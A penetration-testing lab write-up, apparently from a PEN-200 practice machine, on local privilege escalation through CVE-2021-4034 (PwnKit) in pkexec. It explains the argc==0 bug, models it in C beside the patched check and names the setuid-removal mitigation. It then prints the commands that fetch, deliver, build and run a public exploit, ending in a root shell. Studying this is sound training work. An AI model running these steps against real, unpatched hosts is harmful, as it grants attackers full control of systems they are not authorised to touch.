CVE-2021-4034


PEAS has flagged the target as vulnerable to CVE-2021-4034 (PwnKit)

The vulnerable program, pkexec, is part of Polkit, the component that decides whether an unprivileged process may carry out a privileged action. pkexec itself is a setuid-root binary that lets an authorized user run a command as another user, normally root, much like sudo.

pkexec mishandles being executed with an empty argument list (argc == 0). Its argument loop starts at argv[1], which in that case lies past the end of argv and aliases envp[0]; pkexec reads a program name from there, resolves it through PATH, and writes the result back into the same slot. An attacker who controls the environment can thereby reintroduce a variable such as GCONV_PATH, which the dynamic loader strips from setuid programs, and make pkexec load an attacker-supplied shared object with root privileges. The flaw was fixed upstream in January 2022 and distributions shipped backported patches; until a system is patched, removing the setuid bit with chmod 0755 /usr/bin/pkexec is the stop-gap mitigation.
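To make that mechanism concrete, here is an added C model of pkexec's argument handling (it is not code from this page and not the berdav exploit's code). It runs the vulnerable logic against an in-memory array laid out the way execve() lays out argv and envp, beside the patched check. The in-memory filesystem, the function names (find_program_in_path, env_lookup, pkexec_main_model, run_argc_zero) and the patched flag are this example's own assumptions; the strings pwnkit.so:., PATH=GCONV_PATH=. and GCONV_PATH=./pwnkit.so:. are the ones the exploit's Makefile and loader use, as the make output further down shows.

```c
/* Added example, not code from the page or from berdav/CVE-2021-4034: a model
 * of the argc == 0 bug in pkexec, run against an array laid out the way
 * execve() places argv and envp on the stack. find_program_in_path(),
 * env_lookup(), pkexec_main_model() and run_argc_zero() are this example's
 * own names, standing in for g_find_program_in_path() and pkexec's main(). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed stand-in for the filesystem. The second entry is the file the
 * exploit's Makefile creates with
 *   mkdir -p GCONV_PATH=. ; cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:. */
static const char *const fake_fs[] = {
    "/usr/bin/true",
    "GCONV_PATH=./pwnkit.so:.",
    NULL,
};

/* Model of g_find_program_in_path(): try "<dir>/<name>" for each PATH entry
 * and return a malloc'd copy of the first candidate that exists in fake_fs. */
static char *find_program_in_path(const char *name, const char *path_env)
{
    const char *dir = path_env;
    for (;;) {
        const char *end = strchr(dir, ':');
        size_t dir_len = end ? (size_t)(end - dir) : strlen(dir);
        size_t len = dir_len + 1 + strlen(name) + 1;
        char *candidate = malloc(len);
        snprintf(candidate, len, "%.*s/%s", (int)dir_len, dir, name);
        for (int i = 0; fake_fs[i]; i++)
            if (strcmp(fake_fs[i], candidate) == 0)
                return candidate;           /* caller owns the allocation */
        free(candidate);
        if (!end)
            return NULL;
        dir = end + 1;
    }
}

/* Return the value of NAME from an envp-style array, or NULL if absent. */
static const char *env_lookup(char **envp, const char *name)
{
    size_t n = strlen(name);
    for (int i = 0; envp[i]; i++)
        if (strncmp(envp[i], name, n) == 0 && envp[i][n] == '=')
            return envp[i] + n + 1;
    return NULL;
}

/* Simplified pkexec main(): skip options, take the first remaining argument
 * as the program to run, resolve it through PATH and store the resolved path
 * back into argv[n]. Returns 0 when the vulnerable path completed, -1 when
 * the patched check refused, 1 when there was nothing to run. */
static int pkexec_main_model(int argc, char **argv, char **envp, int patched)
{
    if (patched && argc < 1)
        return -1;                  /* the upstream fix: reject argc == 0 */
    unsigned n;
    for (n = 1; n < (unsigned)argc; n++)
        if (argv[n][0] != '-')
            break;                  /* first non-option argument */
    const char *path = argv[n];     /* argc == 0: n == 1, so this reads envp[0] */
    if (path == NULL)
        return 1;
    if (path[0] != '/') {
        const char *path_env = env_lookup(envp, "PATH");
        char *resolved = find_program_in_path(path, path_env ? path_env : "");
        if (resolved == NULL)
            return 1;
        argv[n] = resolved;         /* argc == 0: this overwrites envp[0] */
    }
    return 0;
}

static char *layout[4];             /* argv and envp, contiguous as on the stack */
static char *last_resolved;         /* malloc'd string left in envp[0] by the last run */

/* Run the model the way the exploit invokes pkexec: argv = {NULL} and an
 * environment whose first entry is a relative program name. Returns what
 * envp[0] holds afterwards, or NULL if the patched model refused to run. */
const char *run_argc_zero(int patched)
{
    free(last_resolved);
    last_resolved = NULL;
    layout[0] = NULL;                       /* argv[0]: argv's NULL terminator */
    layout[1] = "pwnkit.so:.";              /* envp[0], which is also argv[1] */
    layout[2] = "PATH=GCONV_PATH=.";        /* envp[1] */
    layout[3] = NULL;
    char **argv = layout;
    char **envp = argv + 0 + 1;             /* envp begins at &argv[argc + 1] */
    if (pkexec_main_model(0, argv, envp, patched) != 0)
        return NULL;
    last_resolved = envp[0];
    return envp[0];
}

int main(void)
{
    const char *vuln = run_argc_zero(0);
    printf("vulnerable pkexec: envp[0] = %s\n", vuln ? vuln : "(unchanged)");
    printf("patched pkexec:    %s\n", run_argc_zero(1) ? "ran" : "refused argc == 0");
    return 0;
}
```

With patched set to 0 the resolved path GCONV_PATH=./pwnkit.so:. ends up in envp[0], so a GCONV_PATH variable now exists in the process environment even though ld.so removed it at startup; the real pkexec then reaches a g_printerr() call whose iconv conversion (CHARSET=PWNKIT, as in the exploit) honours GCONV_PATH and loads pwnkit.so as root. With patched set to 1 the argc < 1 check refuses before anything is read from argv.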

Exploit


Exploit found online

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hetemit]
└─$ git clone https://github.com/berdav/CVE-2021-4034 ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56 (from 1)
Receiving objects: 100% (92/92), 22.71 KiB | 894.00 KiB/s, done.
Resolving deltas: 100% (44/44), done.

Downloading & packaging the exploit

Exploitation


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hetemit]
└─$ scp -i ~/.ssh/id_ed25519 ./CVE-2021-4034.tar.gz cmeeks@$IP:/var/tmp/
Enter passphrase for key '/home/kali/.ssh/id_ed25519': 
CVE-2021-4034.tar.gz             100%   41KB 601.0KB/s   00:00    

Delivery complete

[cmeeks@hetemit tmp]$ tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034
[cmeeks@hetemit CVE-2021-4034]$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.
[cmeeks@hetemit CVE-2021-4034]$ ./cve-2021-4034
sh-4.4# whoami
root
sh-4.4# hostname
hetemit
sh-4.4# ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.218.117  netmask 255.255.255.0  broadcast 192.168.218.255
        ether 00:50:56:9e:bf:75  txqueuelen 1000  (Ethernet)
        RX packets 22380  bytes 3803877 (3.6 MiB)
        RX errors 0  dropped 183  overruns 0  frame 0
        TX packets 13701  bytes 3758799 (3.5 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 521  bytes 172389 (168.3 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 521  bytes 172389 (168.3 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise